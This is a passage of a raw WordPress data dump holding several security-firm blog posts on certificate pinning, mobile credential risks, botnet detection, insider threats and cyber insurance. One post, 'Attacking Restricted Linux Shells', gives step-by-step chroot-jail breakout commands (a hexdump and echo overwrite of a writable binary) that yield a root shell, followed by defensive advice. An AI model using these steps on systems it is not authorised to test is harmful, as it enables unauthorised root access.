  2. The server’s name (via DNS) matches the Common Name (CN) presented in the SSL certificate
In the case where these do not match, the application (or browser) throws up a warning and lets the user decide what to do. In many cases, the general user population will not understand the warning and just decide to accept the invalid certificate.

What are we trying to do by certificate pinning?

The idea is to prevent a man in the middle attack. This allows the attacker to get in the middle of the conversation between a client and server. They could be just eavesdropping on the conversation or could be changing the data as it moves to the client or server. An attacker who gains control of a user’s operating system can install trusted root Certificate Authorities. These root CAs will be able to sign new certificates, which will satisfy SSL validation procedures. Certificate pinning prevents this by ensuring a specific server public key is used to initiate secured traffic.

How do we implement certificate pinning?

Distribute the server’s public key with the application. Any time the application begins an SSL exchange with the server, validate that the traffic has been encrypted with the same key that matches the public key included with the app. This takes the CA system out of the equation and assuming it is the correct certificate, the names do match.

Is there a way to break certificate pinning?

An attacker would have to decompile the application, change the code, rebuild it and redeploy the application. Another option would be to run the application in a debugger. For Android, you can obfuscate your code. You can also check to see if the application is running in a debugger. Code signing will also make it more difficult for an attacker to create an unauthorized patch for your application. For iOS, see Detecting the Debugger For Android, see Securing Android LVL Applications Neither of the above options are perfect, but they do help. Both of these methods make the attacker’s job harder, but not impossible.

Where else can I find information on this?

OWASP provides some information and sample code: User Privacy Protection Cheat Sheet and Pinning Cheat Sheet Moxie Marlinspike provides good information for an Android on his blog: Your app shouldn’t suffer SSL’s problems iSecPartners provides other information for iOS: SSL Pinning on iOS —— Be sure to check out author Steve Kern’s webinar on Assessing the Security of Your Mobile Applications [post_title] => Certificate Pinning in a Mobile Application [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => certificate-pinning-in-a-mobile-application [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:23 [post_modified_gmt] => 2021-04-13 00:05:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1167 [menu_order] => 536 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [82] => WP_Post Object ( [ID] => 1169 [post_author] => 91 [post_date] => 2013-03-25 07:00:50 [post_date_gmt] => 2013-03-25 07:00:50 [post_content] => Lately, I've been working with some older technologies, and I've gotten to play with some of the restricted access shells that used to be popular. Many older appliances used to include an sshd that allowed users into a chroot jail with restricted access to binaries. This was done in an attempt to allow the user to access the appliance’s functionality without exposing the internal workings of the application. Fortunately, many chroot jails fail to properly set some essential security bits, assuming that restricting binaries is enough to keep users out of the real filesystem, while also giving users root access to their chroot jail. With just these three things, you can break out of any chroot jail:
  1. Root access – you’ll need root access *inside* your chroot jail to execute a breakout. This is the weakest link here, but many chroot jails have been improperly configured, as root privileges are used to access the application functionality that the shell is supposed to expose.
  2. The echo utility – this is built in to several shells, so you can rely on this in many situations.
  3. A file that you have both write and execute privileges on – if the chroot jail has been properly secured you won’t have access to chmod, but check the filesystem for these privileges. This will allow you to get your breakout on the filesystem and to execute it.
Now for the juicy bit. To break out of your jail, the basic steps are pretty simple. Determine if you have chmod available inside your chroot jail. If you don’t, search for a file with both write and execute privileges . You can use find –executable –writable or ls –lR / | grep wx to search entire partitions for these files. This might be difficult if you don’t have find or grep, but you can check common locations for executables like /bin/. Remember the path of this file, as you’ll have to overwrite it later. Spin up a VM with the same kernel as the machine hosting the chroot jail you’re targeting. Grab code for a chroot jail (there are examples all over the internet). For the purposes of this demonstration, I’ve put my code into breakout.c. All this code does is create a file descriptor for the current directory and then makes a new chroot jail in a subdirectory. Since the program has saved a file descriptor to a directory outside this new sub-chroot jail, the program will use fchdir to hop back out of the new chroot jail and onto the main directory structure. Then it cd’s all the way back up to the real root where it execs a new shell. Use gcc to compile the code into a binary on your VM. Use hexdump with the command below to dump the binary into the format you’ll need. This command works just like a C printf statement:

hexdump -ve '"\x" 1/1 "%02x"' bin.o > echo_this

Copy the contents of the file echo_this, and paste them into an echo command inside the chroot jail:

Echo –ne x7fx45x4cx46… > name_of_file_from_first_step (ie: /bin/writeableBinary)

Finally, you can just execute the file you've just overwritten to escape the jail. This will provide you with a root shell on the complete file system of the machine you were jailed in earlier. Preventing this is actually pretty simple, and just relies on some linux security basics that sometimes get neglected in these chroot jails. Don’t let the user run as root, if you can avoid it. If a user has to run as root, restrict access to binaries, and make sure there aren't any files that they have both write and execute permissions on. [post_title] => Attacking Restricted Linux Shells [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-restricted-linux-shells [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:34 [post_modified_gmt] => 2021-04-13 00:05:34 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1169 [menu_order] => 539 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [83] => WP_Post Object ( [ID] => 1188 [post_author] => 91 [post_date] => 2012-10-16 07:00:50 [post_date_gmt] => 2012-10-16 07:00:50 [post_content] => I’ve been playing around with some Android exploitation lately, and I wanted to clarify the risks associated with storing domain credentials anywhere on a mobile device. Obviously, gaining access to your email or calendar could expose some sensitive information, or could allow for password resets via email or some social engineering, but I feel like the real risk lay elsewhere. Most mobile devices when associated with an Exchange server will store credentials in cleartext. This means that any malicious attacker who can get root access to your phone can gain access to your domain credentials. The risk this presents is dependent on your organization, but if your organization has any external resources accessible via RDP or uses AD authentication on the VPN, an attacker can just hop right into your environment. This is true on Android and iOS for sure; to prove it to you, my technical paper has practical guidelines on how to extract credentials from a mobile phone. Check it out! Download "Dark Harvest - Active Directory Credentials on Mobile Devices" [post_title] => Android Exploitation Technical Paper Release [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => android-exploitation-technical-paper-release [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:22 [post_modified_gmt] => 2021-04-13 00:05:22 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1188 [menu_order] => 561 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [84] => WP_Post Object ( [ID] => 1205 [post_author] => 91 [post_date] => 2012-06-07 07:00:50 [post_date_gmt] => 2012-06-07 07:00:50 [post_content] =>

Pattern unlock sucks. Everyone knows it. Pattern unlock provides security benefits that are dubious at best. Anyone can shoulder surf your pattern, or even your PIN, since most PINs are displayed at least momentarily in cleartext. Phone manufacturers have noticed the problem, and tried to create new lock technologies that don’t suck: Motorola had a fingerprint reader on the Atrix, and Google’s ICS includes face-unlock. While either of these options are better than PIN or pattern unlock, I think we can do better. Every day there are new gadgets released to work with smartphones. Mostly, these devices are curiosities or toys; smart balls that can be controlled by phone, or remote control airplanes. All of these toys include the raw components to fix the problem with PIN/pattern unlocks forever. Combine a wireless interface (Bluetooth, NFC, or WIFI) with certificate based authentication, and we’ve just created a second factor for authenticating to your phone. Multi-factor authentication relies on two different pieces to prove your identity: something you have (a physical device, which will authenticate your phone) and something you know (your pin or gesture).  Actually, this technology is pretty similar to modern cars that don’t have a key, but rather radio keys that allow the car to be started whenever the key is inside the cab. Imagine that instead of/addition to unlocking your phone with a PIN or pattern, you had a keychain dongle to activate. Press a button, or pass the phone within NFC distance, and the phone and your new authentication device exchange cryptographic signatures to validate each other’s presence. Your phone now knows with some degree of certainty that it’s in the presence of a physical token separate from your phone. Using modern cryptographic signatures, this process wouldn’t be vulnerable to mere replay attacks; using encryption with signatures can prevent Man-in-the-middle attacks. That isn’t to say this system wouldn’t have any issues at all. Obviously, if someone steals your phone, there is potential for them to steal your keys. Especially if you’re robbed, mugged or your house is broken into. I’m not super sure that the security of your phone should be your top priority in those instances, however. Luckily, since your phone has a constant internet connection, it’s even possible to create a method for deactivating an authentication token remotely. Much like how SSL certificates can be revoked, if the authentication device is designed correctly a central authority may be able to prevent a stolen token from authentication to your phone.

[post_title] => Smartphone Pattern Unlock Sucks [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => smartphone-pattern-unlock-sucks [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:59 [post_modified_gmt] => 2021-04-13 00:05:59 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1205 [menu_order] => 578 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [85] => WP_Post Object ( [ID] => 1211 [post_author] => 91 [post_date] => 2012-04-02 07:00:50 [post_date_gmt] => 2012-04-02 07:00:50 [post_content] => Mobile security is the new hotness.  The conventional wisdom hasn’t yet been established, but many security proponents are gunning for users who jailbreak or root their devices.  Symantec and Good both offer enterprise solutions that include features to manage root privileges on employee devices.  Unfortunately, malware engineers just changed their approach. As background, many approaches to mobile security rely on preventing users from gaining root access.  Root access allows a user ultimate control over the phone, regardless of the inherent protections built into the device’s operating system.  Many users who go about acquiring root access do so in order to harmlessly customize their device.  Some users leverage root privileges to subvert controls on functionality like mobile tethering.  In any case, this process is seen as a risk since a user who roots their phone is capable of granting these enhanced privileges to any application that requests escalation.  If a user inadvertently grants root privileges to a piece of malware, that malware could access any data on the phone, including potentially protected, corporate information. In August, a piece of malware called GingerMaster was found to escalate to root privileges on any device compromised.  From a management perspective, it no longer matters whether or not users in a given environment have rooted handsets.  At this point, a user with a rooted device who installs a malicious app is just as likely to expose sensitive or controlled information as a user without a rooted device. This means there isn’t a technical control that can prevent a given user from installing a malicious app and accidentally compromising anything from their email to their entire corporate environment. Just like with SSL certificates, users will have to learn to differentiate between helpful apps and malicious ones.  Thankfully, attackers are still disguising most of their malware pretty poorly.  The cutting edge malware GingerMaster, for example, was disguised as “Beauty of the Day.” [post_title] => Mobile security is the new hotness [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => mobile-security-is-the-new-hotness [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:31 [post_modified_gmt] => 2021-04-13 00:05:31 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1211 [menu_order] => 584 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [86] => WP_Post Object ( [ID] => 1230 [post_author] => 91 [post_date] => 2011-09-29 07:00:18 [post_date_gmt] => 2011-09-29 07:00:18 [post_content] => We all want to believe that our co-workers will do the right thing.  That we need to focus our security efforts on the bad guys "out there."  However the insider threat is one of the worst incidents that an organization can withstand.  Carnegie Mellon's CERT® Coordination Center  has launched the CERT Insider Threat Database.  They have collected approximately 700 cases of insider activity that "resulted in the disruption of an organization's critical information technology (IT) services."   I realize that 700 cases since they started collecting data in 2001 seems like a drop in the bucket but it's important to remember that these are cases involving the critical IT services, and were reported to CERT.  Many incidents are not reported as the organization doesn't want the negative publicity, or in even worse cases, the perpetrator hasn't been caught (yet).  In many discussions about Insider Threats I've referred to the San Francisco IT Administrator charged with holding the city's network hostage.  In this particular case he didn't give the administrative credentials back to his employer but kept the systems operational.  It was a good example but is now a bit dated (2008) but it was only a matter of time before another one emerged. With a roar, it did.  An IT Administrator has recently pleaded guilty to crippling his former employer's network.  Now some have dubbed this a "hacking spree" but I would like to differentiate this as not a hack, but an individual that had elevated privileges that became so disgruntled that he lashed out.  When he did so, he didn't use specialized hacking tools or techniques, instead he used a common administrative tool to delete critical IT systems causing in excess of $800,000 in damages according to court documents.  What makes this example worse is that this individual resigned before the attack, but the organization kept him on as a consultant "due to this extensive knowledge of the company's network."  He performed his attacks with valid user credentials and common support tools.  Why am I trying to draw such a distinction whether this is hacking or not?  When discussing risks as either part of your normal risk assessments, Risk Management Program, etc. I think it is important to draw the distinction as it relates to policies and implementable controls.  There is usually a lot of effort put into place to protect against malicious and unauthorized attacks (i.e., hacking) compared to disgruntled individuals with elevated privileges.  Malicious?  Yes.  Unauthorized?  No.  That's the scary part and the one that needs to be addressed by each and every organization. The take away here is to ensure that segregation of duties is followed so not one person has keys to the kingdom and disgruntled employees are not retained where they can cause extensive damage to the organization. [post_title] => Insider Threats [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => insider-threats [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:06:07 [post_modified_gmt] => 2021-04-13 00:06:07 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1230 [menu_order] => 604 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [87] => WP_Post Object ( [ID] => 1253 [post_author] => 91 [post_date] => 2010-12-30 07:00:50 [post_date_gmt] => 2010-12-30 07:00:50 [post_content] => Does your phone have a firewall?  Does it have antivirus?  Should it?  I'll wager your laptop does.  That's because your laptop faces the looming threat of attackers from the internet every time to connect to a network.  Additionally, any time you use a network, you expose yourself to the potential for a network level attack.  Everyone knows that an unprotected computer is pwnage waiting to happen.   So what about your phone? Your phone is connected to the internet 24/7.  What's more, it lacks a lot of the controls that would normally be applied to a network computing device.  It has no firewall, no antivirus, and most users can't even kill processes or modify the file system without voiding their warranty.  The user has to rely on the closed nature of the device, and hope there are no exploits roaming the wild.  This is paper-thin security at best, especially when you consider the trends in modern phone usage are pushing for more devices containing more sensitive data. So how does an attacker target a mobile device?  They don't have to: given some recent developments in the Metasploit framework, they can initiate wide ranging automated attacks against anyone they can connect to.  Consider the open Wi-Fi network, such as at a coffee shop.  As customers sit down, and link up laptops and phones, an attacker keeps track of hosts joining the network.  Then, leveraging the power of the autopwn feature of Metasploit, an attacker can attempt any number of exploits against any number of hosts, smartphone or not.   Your laptop might withstand automated attacks because it has a firewall and antivirus.  Your phone doesn't.  There is no "Do you want to allow this app to run?" There is no "Would you like Windows Firewall to allow access to this program?" That's it.  An attacker now has access to your phone's audio, camera, data access, and any stored credentials or other sensitive data.  Metasploit has payloads in development for both the iPhone and Android platforms that will give root access to the phone, pending a successful exploit.  Finding more exploits is only a matter of time.  So this brings me to my point: Should your phone have a firewall? [post_title] => In Which a Smartphone is Pwnt, Thoroughly and Without Reason [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => in-which-a-smartphone-is-pwnt-thoroughly-and-without-reason [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:30 [post_modified_gmt] => 2021-04-13 00:05:30 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1253 [menu_order] => 630 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [88] => WP_Post Object ( [ID] => 1288 [post_author] => 91 [post_date] => 2010-01-07 07:00:41 [post_date_gmt] => 2010-01-07 07:00:41 [post_content] =>

Application security attacks are increasing

According to Gartner, 75% of the attacks are coming though web applications and not through the network. This means greater emphasis needs to be placed on application security. However, this does not appear to be happening.

Application security vulnerabilities are increasing

For the first half of 2009, Cenzic identified about 3,100 total vulnerabilities, which is an increase of over 10 percent from the second half of 2008.  (https://www.cenzic.com).  Another revealing piece of data: WhiteHat Security has stated that in 83% of the 1,300 websites they scan have had at least one serious vulnerability (https://www.whitehatsec.com). Of the projects NetSPI has done in the application security area, 83% of these projects also had serious findings (serious vulnerabilities are those of HIGH, CRITICAL, or URGENT severity as defined by PCI DSS naming conventions).

What can happen if you do not fix the problems?

The first real risk is the theft of your data or your customers’ data. If applications are not done right, SQL Injection can allow a person (or persons) access to your database. Think TJX and all of the problems they had. Another risk is to your company’s reputation. Given the right situation, a user could be redirected to a site that is not under your control. It could be a porn site or even a site that looks like yours; it just exists to steal your users’ credentials. Your reputation will take years to repair, and the cost to your company may be insurmountable.

What can you do?

Many of the problems can be fixed by training. These do not have to be external training courses; they could just be brown bag lunches that cover specific secure coding techniques. A good place to start is the OWASP web site (https://www.owasp.org ). This site gives good information on detecting and preventing these vulnerabilities.

Perform code reviews and application vulnerability assessments on a regular basis. Code reviews need to be performed every time the code changes. Application vulnerability assessments need to be done at least annually.

By doing code reviews, and vulnerability assessments, you are helping both your company and your customers.

[post_title] => What's Happening in the Application Security Arena? [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => whats-happening-in-the-application-security-arena [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:06:17 [post_modified_gmt] => 2021-04-13 00:06:17 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1288 [menu_order] => 658 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [89] => WP_Post Object ( [ID] => 1294 [post_author] => 91 [post_date] => 2009-11-16 07:00:41 [post_date_gmt] => 2009-11-16 07:00:41 [post_content] =>

Let's talk about application vulnerability assessments, penetration testing, and code reviews. How effective they are depends on a number of factors: the education and experience of the testers, the tools used, the restrictions put on the testers, or even the environment in which the testing is done. This post focuses on the education and experience of the testers.

Consider the well-known recent case of the Heartland breach. Robert O. Carr, Chairman and CEO of Heartland Payment Systems, was quoted as saying the following: "In early 2008 we hired a QSA to perform a penetration test which found nothing. On April 30, 2008, we were deemed PCI-compliant" (https://www.infosecurity-us.com/view/4562/qsa-system-is-broken-says-heartland-ceo/).

I wonder if Heartland Payment Systems queried the QSA company on the background of the pen tester. Yes, the company was QSA-certified, but did the person or persons actually doing the penetration test have the education and experience needed to perform a pen test well? Not everyone does. This also goes for application vulnerability assessments and code review. Just because you hire a company that sells itself as having experts on staff does not always mean you get the top dog or even the middle dog. You might be getting a puppy. If the company performing the testing uses a team approach, the team's collective knowledge might be as good as or better than that of the top dog.

Find out who will be performing your tests and get their resumes, or at least ask them about their background. What kind of training and experience do they have in this area? Are they right out of school or do they have at least a couple of years of experience? Does the firm employ a team of specialists? Is their work process mature and well defined?

These are not hard questions to ask or answer. Making this small effort could make a big difference in the effectiveness of your application security assessments, and your organization's overall information security.

[post_title] => How Good Are Your Application Security Assessments? [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => how-good-are-your-application-security-assessments [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:06:06 [post_modified_gmt] => 2021-04-13 00:06:06 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1294 [menu_order] => 664 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [90] => WP_Post Object ( [ID] => 1308 [post_author] => 91 [post_date] => 2009-10-20 07:00:50 [post_date_gmt] => 2009-10-20 07:00:50 [post_content] =>

The Internet is a vast and unforgiving wilderness; every day, some new monstrous beast rears its ugly head and threatens the hapless denizens of networks everywhere. The only thing standing between those Internet citizens and complete ownage is the security industry. This means that we have to adapt to the newest and biggest threats on the Internet. Recently, the industry has shown its vulnerability to a particularly nasty threat: botnets. This malware is dangerous because it is difficult to detect before some workstations start broadcasting administrator passwords, online credentials, or even credit card and social security numbers. What's more, botnets can adapt to hide from common detection techniques and antivirus configurations. Prevention is, of course, the best answer, but it can't be the only line of defense. Pfizer lost some serious credibility when its networks started uncontrollably spamming people with offers for Viagra (a product they make), and as recently as September it was revealed that over half of Fortune 100 companies had networks infected with a botnet called Mariposa. The problem isn't a simple one.

More recent approaches to botnet detection have come in the form of network-based detection. Many botnets rely on dynamic DNS solutions to obfuscate data collection centers, and David Dagon wrote an interesting presentation on DNS-based detection of forming botnets. These dynamic DNS solutions tend to be abused by botnet owners, allowing them to hijack hundreds of third-level domains from dynamic DNS servers for use in controlling botnets or aggregating data. Fortunately, this means that the botnet will require a lot of DNS traffic during formation, and this footprint allows for easily isolation of the infected hosts, before they transform into a rampaging swarm of zerglings and spew your data all across the Internet. It won't save anyone from an already formed botnet, and it won't prevent a distributed denial of service attack that originates externally, but it's another layer of protection for internal data.

[post_title] => Botnet Detection and Dynamic DNS [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => botnet-detection-and-dynamic-dns [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:15 [post_modified_gmt] => 2021-04-13 00:05:15 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1308 [menu_order] => 676 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) ) [post_count] => 91 [current_post] => -1 [in_the_loop] => [post] => WP_Post Object ( [ID] => 28189 [post_author] => 91 [post_date] => 2022-08-09 09:00:00 [post_date_gmt] => 2022-08-09 14:00:00 [post_content] =>

It’s no secret that data breaches are costly. IBM’s annual Cost of a Data Breach report illustrates this well:  

  • The average cost of a data breach in 2021 was $4.35 million. 
  • The average cost of a ransomware attack, not including the cost of the ransom was $4.54 million in 2021.
  • 60 percent of organizations’ breaches led to increases in prices passed on to customers. 

Given the significant costs associated with data breaches, organizations are increasingly looking to cyber insurance to help protect their businesses against financial losses from a cyber attack. In fact, in IBM’s report, “insurance protection” was a key factor that lowered the average total cost of a data breach.  

Yet, cybersecurity insurance is still considered an emerging space, one that is notoriously difficult to navigate. 

For insights on the topic, we recently sat down with industry experts Ethan Harrington, Founder and Principal at 221b Consulting, and Mary Roop, Consultant at 221b Consulting, to discuss the current state of cyber insurance and get answers to some of our burning questions. Continue reading for highlights from the discussion.

What’s going on in the cyber insurance market? 

Ethan Harrington: The market is terrible, and many of the issues we've started to experience have surfaced just within the last few years. Last year was a historical year, and not for good reason. We saw a 300-plus percent increase in ransomware. We also saw our clients experience triple-digit increases in their cyber insurance premiums. 

On average, a company categorized as having "good" risk levels may see a 15 to 20 percent increase in premiums, and those at the "questionable" risk level or that have had claims experience may see another three-digit percentage increase. 

Why is this happening? Market corrections. The insurance marketplace is global, and all of these insurers are writing more than cyber coverage. When they have a year where auto liability coverage is bad, they're typically going to try to make up some of that premium in other places because they have to make money. In 2019 and during COVID-19, auto liability and general liability were extremely stressed, along with other claims completely unrelated to cyber. So, we knew that there was going to be a potential correction. 

But what we saw last year was a complete market shift. We’ve never seen anything like this before. We’re concerned that what we’re seeing right now is going to perpetuate for many more years and are unsure if coverages are ever going to return to what they were and how the associated premium will be impacted.  

As cyber insurance matures, is it becoming yet another regulation or standard to comply with? 

Ethan: Yes and no. Yes, because it is another party that is keenly interested in what organizations are doing to not only harden their defenses and protect their financials but also protect Personally Identifiable Information (PII) or data from a potential ransomware attack that could cause business interruption. 

No, because most insurance carriers understand that there are several golden standards to adhere to, whether it's the National Institute of Standards and Technology (NIST) or the International Organization for Standardization (ISO). If you can document that you follow one or a combination of them, then I think that most would understand it. 

Insurers are starting to layer on more requirements beyond what NIST or ISO would indicate as guidance – and they’re asking questions specific to CISOs. They're starting to ask questions about cyber resiliency. In general, most regulatory frameworks that organizations follow focus on preventative actions. Now, carriers are focusing on reactive responses to cyber attacks, looking at what you are doing to limit the potential impact if you do have to file a claim. 

There’s more scrutiny involved in cyber insurance today, and it's different from what other regulators require.  

Who typically manages the cyber insurance process? 

According to the webinar attendees, here is the breakdown of how cyber insurance is managed at their respective organizations, many of which came from financial institutions: 

  • 42% risk management  
  • 25% finance 
  • 25% information security  
  • 8% general counsel/legal 

Mary Roop: Whoever runs risk management typically controls the placement, but it truly is a partnership between the person responsible for placing the insurance policies, the information security team, the privacy team within legal, and the team responsible for Payment Card Insurance (PCI) compliance.  

These teams need to work together to ensure an understanding of the cyber hygiene and the data incident response within your organization. This creates a holistic picture with complete information useful in the robust cyber insurance application and underwriting process. 

How has ransomware played a role in the cyber insurance market?  

Ethan: Ransomware decimated the entire insurance industry from a cyber perspective. In 2021, there was a 300-plus percent increase in ransomware attacks. Ransomware used to be a quick way for adversaries to grab cash, but they've become more intelligent, conducting background checks into businesses to determine what their financials look like to identify the most realistic ransom amount to ask for. 

Ransomware is not going away anytime soon, and the cyber insurance market is responding to that. Now, we are starting to see sub-limits within insurance policies specific to ransomware, separate retentions as it applies to ransomware, and different changes in waiting periods (eight hours then vs. 24-48 hours now). But I expect that'll start to lessen, and some of those policies will return to what they were before. 

Want to improve your ransomware prevention and detection? Explore NetSPI’s ransomware attack simulation services. 

How have cybersecurity insurance questionnaires evolved? 

Ethan: 15 years ago, none of the insurers had any expertise in cybersecurity. Many insurance companies recognized that they do not understand cybersecurity and hired third parties to come in and ask the questions on their behalf.  

That has changed. Lots of insurance carriers are now hiring specific technical people that have been consultants in cyberspace or those who managed security service providers because they understand the market much better. Now, insurance companies are teaching them insurance and how to do underwriting versus outsourcing. 

How do you navigate situations where providers require specific vendors for your solutions and controls? 

Mary: If your cyber insurance carrier isn't already requesting this within the application, we do recommend getting pre-approval on your data incident providers. They may be included on that pre-approved list already, and if not, they're going to have to be vetted extensively by those providers.  

This process is lengthy, but it is important to undertake before starting your renewal strategy. Go meet up with your legal team to determine the outside counsel that you can use to help advocate for your vendor choices. Carriers want to understand vendor credibility if they're not familiar with them. 

Getting ahead of this process is important because you don't want any surprises when a data incident occurs. Like when your carrier says, "We're not going to approve this claim because you do not use an approved vendor." If you are proactive about this, you can go to the leaders of the respective departments and come up with a solution before it's too late. 

There has been talk about possibly monitoring clients’ cyber behavior and adjusting insurance premiums accordingly. How might we see a program like this play out? 

Ethan: We don’t like insurance companies constantly monitoring and doing scans of environments. It looks bad for the insurance industry because we all know that there's going to be weaknesses that can be found if you look close enough.  

If an insurance company is constantly scanning your system, it is possible that they're going to come back to you and say, “We need you to fix this.” At some point, the CISO is going to say, “I don't have any more risk management practices that I can apply to protect us against that.” Security teams can do everything they can, but if employees/personnel make a negligent mistake or are heavily targeted, they can cause a massive claim to occur. 

We’re putting the CISO in a difficult position where they’re trying to manage the board, protect their critical assets, and now all of a sudden, they also need to keep an insurance company happy.  

Some scans delve into the depths of systems to find vendors and clients that you've referenced and how they could affect your insurance. Underwriters, especially in financial services, are looking at the kind of brand reputation or loss of business income that might be impacted if there was a data security incident. It's becoming exceedingly difficult for underwriters to try to figure this out. 

Have you seen any companies go under because they've failed to secure cyber insurance due to poor IT security controls? 

Ethan: Thus far, no, I have not seen anybody that has actually gone under because they didn't buy cyber insurance. But I anticipate it is going to happen, especially with the triple-digit increases in premiums. 

We are seeing more and more companies that are not buying or cannot obtain cyber insurance, and it will come back to bite them in some capacity. It's likely that we will see organizations going under as a result of the rising financial costs associated with breaches today. 

For the full conversation and more in-depth insights from Ethan, Mary, and Norman, watch the on-demand webinar.

[post_title] => The Current State of Cyber Insurance [post_excerpt] => Get answers to your cybersecurity insurance questions with industry experts Ethan Harrington and Mary Roop from 221b Consulting. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => state-of-cyber-insurance [to_ping] => [pinged] => [post_modified] => 2022-08-05 17:48:57 [post_modified_gmt] => 2022-08-05 22:48:57 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28189 [menu_order] => 7 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [comment_count] => 0 [current_comment] => -1 [found_posts] => 91 [max_num_pages] => 0 [max_num_comment_pages] => 0 [is_single] => [is_preview] => [is_page] => [is_archive] => [is_date] => [is_year] => [is_month] => [is_day] => [is_time] => [is_author] => [is_category] => [is_tag] => [is_tax] => [is_search] => [is_feed] => [is_comment_feed] => [is_trackback] => [is_home] => 1 [is_privacy_policy] => [is_404] => [is_embed] => [is_paged] => [is_admin] => [is_attachment] => [is_singular] => [is_robots] => [is_favicon] => [is_posts_page] => [is_post_type_archive] => [query_vars_hash:WP_Query:private] => 963f2e5eb8e0eac4d7dd161115b2c195 [query_vars_changed:WP_Query:private] => [thumbnails_cached] => [stopwords:WP_Query:private] => [compat_fields:WP_Query:private] => Array ( [0] => query_vars_hash [1] => query_vars_changed ) [compat_methods:WP_Query:private] => Array ( [0] => init_query_flags [1] => parse_tax_query ) )
NetSPI Response to COVID-19
Team NetSPI